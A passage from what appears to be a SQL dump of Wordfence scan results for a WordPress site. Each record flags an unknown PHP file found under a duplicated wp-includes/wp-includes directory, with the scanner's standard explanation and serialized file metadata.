tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/ms-default-filters.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77938,1675048861,1675048861,'new','knownfile',75,'2d090aee41578c1eb922c27899585bfa','fcabe604025707d10536f5c04dbeade6','Unknown file in WordPress core: wp-includes/wp-includes/ms-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/ms-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77939,1675048861,1675048861,'new','knownfile',75,'00a7a940aeca716f86336c0efd5ed603','f7be32c9cfe37b8eb0b3335d8eafa8f1','Unknown file in WordPress core: wp-includes/wp-includes/ms-files.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/ms-files.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77940,1675048861,1675048861,'new','knownfile',75,'d3475c4e06537b94f3bff698c5c93fca','b0e937534322d87d147dc91b38b9a7b1','Unknown file in WordPress core: wp-includes/wp-includes/ms-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/ms-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77941,1675048861,1675048861,'new','knownfile',75,'72e3eb9a451932a6d5b78925787604ef','1a6f8e623851929970f4bb7e71fc1ec8','Unknown file in WordPress core: wp-includes/wp-includes/ms-load.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-load.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77942,1675048861,1675048861,'new','knownfile',75,'cac2efbc366636385d3dabaceb9bef0a','9d97860b7cd52fda11056b17bc7ca767','Unknown file in WordPress core: wp-includes/wp-includes/ms-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ms-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77943,1675048861,1675048861,'new','knownfile',75,'34332f43b6dd4d4a23093ced2250f400','229d71c785b7f8b0c992ccb3e369bf33','Unknown file in WordPress core: wp-includes/wp-includes/ms-settings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/ms-settings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77944,1675048861,1675048861,'new','knownfile',75,'1a6b43315ed86cf850a6baf05f529f3e','e252ec1ba2cd718608b40ba9a345bd83','Unknown file in WordPress core: wp-includes/wp-includes/ms-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/ms-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77945,1675048861,1675048861,'new','knownfile',75,'2f361002112533eac2c0c029764d4498','d0a8d379ada2f5a5a14f49fea82af1cc','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/nav-menu-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77946,1675048861,1675048861,'new','knownfile',75,'e38a7d723c40606695626ae6c3742cf8','0e99e3bb204441bc65cf49a521b19c00','Unknown file in WordPress core: wp-includes/wp-includes/nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77947,1675048861,1675048861,'new','knownfile',75,'be55f2e3a0826101a283b4f4b4b1dc1d','8f1384c587abbbe26822e2ad221e17ef','Unknown file in WordPress core: wp-includes/wp-includes/option.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/option.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77948,1675048861,1675048861,'new','knownfile',75,'a590fea8bb249cfa447b9ac12983c771','f722b89d18c6d764ae03bf7f14266ba5','Unknown file in WordPress core: wp-includes/wp-includes/pluggable-deprecated.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/pluggable-deprecated.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77949,1675048861,1675048861,'new','knownfile',75,'04e0b2f7086563cd5c1415e36c5f0f9b','f402a137241f8062671cfeb4dd6c2fbd','Unknown file in WordPress core: wp-includes/wp-includes/pluggable.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/pluggable.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77950,1675048862,1675048862,'new','knownfile',75,'e831e162b44e093eb531d65f67e7de70','cd19fbaeeb17f178a0254ab2dc4792bf','Unknown file in WordPress core: wp-includes/wp-includes/plugin.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/plugin.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77951,1675048862,1675048862,'new','knownfile',75,'0b00baa4739595b94c2ff8031678dcbe','c0af213c344cf0db5e154a004c9d81a1','Unknown file in WordPress core: wp-includes/wp-includes/post-formats.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/post-formats.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77952,1675048862,1675048862,'new','knownfile',75,'08bbd3714d9dd3c3fb1b4e7ee4535c9d','a3ba9bc7f45bb80c7264d16786469307','Unknown file in WordPress core: wp-includes/wp-includes/post-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/post-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77953,1675048862,1675048862,'new','knownfile',75,'59ef630a2d95b414ffebbfe590c8973a','c39917605eee6378d1516ec74ade53bc','Unknown file in WordPress core: wp-includes/wp-includes/post-thumbnail-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/post-thumbnail-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77954,1675048862,1675048862,'new','knownfile',75,'1106e612b0dc193a86cf721e999ed09f','5a42cf21699ebe8d957051fc25ab0b13','Unknown file in WordPress core: wp-includes/wp-includes/post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77955,1675048862,1675048862,'new','knownfile',75,'b95988d058b6d4e934245e9e8e875b57','fd8dec24eccdf13b78d77621f0cf3f32','Unknown file in WordPress core: wp-includes/wp-includes/query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77956,1675048862,1675048862,'new','knownfile',75,'e3e218d83104484c2f68a70e83e52425','33211c16796eef6c9cfa68f197bb710d','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/byte_safe_strings.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/random_compat/byte_safe_strings.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77957,1675048862,1675048862,'new','knownfile',75,'8643c21e03db0690d2852f9593a112b8','f2bfda893aa7e38c12523864a85212b4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/cast_to_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/random_compat/cast_to_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77958,1675048863,1675048863,'new','knownfile',75,'71dcaa912f379b128bc4d4ad305b83c9','20717ede3e875f1141f93aa829677f9e','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/error_polyfill.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/random_compat/error_polyfill.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77959,1675048863,1675048863,'new','knownfile',75,'c61dc4775b443d144519cba8812fa63d','b80cfa1b47f19ba886f900412fdf11a4','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/random_compat/random.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77960,1675048863,1675048863,'new','knownfile',75,'351bf7722138c140b01e115b633854d6','49f2c7d4e4b618e24903df6563873e00','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77961,1675048863,1675048863,'new','knownfile',75,'be99931db52bc3ca523dd6336e6f9aaa','9b6ef490e089bae8e417ffc681164086','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77962,1675048863,1675048863,'new','knownfile',75,'1c2ef4463ea923b65c885a250e2faaa7','66f2fde291e546ff1849445f6b6ab164','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77963,1675048863,1675048863,'new','knownfile',75,'368b699a2162d51273d546bfff6123a0','1f798741e7215f9579ac3f3a2265e752','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77964,1675048863,1675048863,'new','knownfile',75,'5290942e4a3d28255cb4f6c32453652b','505c8eb72c85c27eddad356c403c718c','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77965,1675048863,1675048863,'new','knownfile',75,'8577eec4e449522bd52675a9d1164dce','8a88f417e287d132dad04875b3de6158','Unknown file in WordPress core: wp-includes/wp-includes/random_compat/random_int.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/random_compat/random_int.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77966,1675048863,1675048863,'new','knownfile',75,'c985626ac8203081c2bf9170bef212f7','eaa8d763984747c6d02c4c99abb56ee6','Unknown file in WordPress core: wp-includes/wp-includes/registration-functions.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/registration-functions.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77967,1675048863,1675048863,'new','knownfile',75,'ec18e4347927903e8c0353def5a4b100','b5971e1b7d4905410490e656864dca2c','Unknown file in WordPress core: wp-includes/wp-includes/registration.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/registration.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77968,1675048863,1675048863,'new','knownfile',75,'9474425fdcd2623cf89f32d33382ef32','15a5e0fe1ea3489c74ff701511b8c480','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/rest-api/class-wp-rest-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77969,1675048864,1675048864,'new','knownfile',75,'95db3451356a32ba9aa1e9db1c9f9b9e','7ca61bfb7d969253e394cd5acdc9dd5a','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/rest-api/class-wp-rest-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77970,1675048864,1675048864,'new','knownfile',75,'676a0be0ab06203a3c2ac37271d222fa','abee2290d00499263b7b98c1062b15af','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/class-wp-rest-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/rest-api/class-wp-rest-server.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77971,1675048864,1675048864,'new','knownfile',75,'1d747ea2f4eb22ae78b3e4e88eced53b','4e9aac160473f0c078ab7a5e5e7eff38','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:93:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77972,1675048864,1675048864,'new','knownfile',75,'4f9b8b5f2288c8f35fef26c470afe5bd','908db93776ba706fb39c650488808d16','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:83:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77973,1675048864,1675048864,'new','knownfile',75,'6a3fed75810919a8db1f0e0aa57dd392','4a9e4ad9e4b8a1dfd9f8f191287eaa96','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:81:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77974,1675048864,1675048864,'new','knownfile',75,'ce34abdf38fc88446f985dcd2c216bf2','4de8b6542e99f8bf1106f4f500a38d6f','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:87:\"wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77975,1675048864,1675048864,'new','knownfile',75,'bce77a25907aeb99637a005751351d84','687e7e524f5065b37fec2bf180f8b9c6','Unknown file in WordPress core: wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also 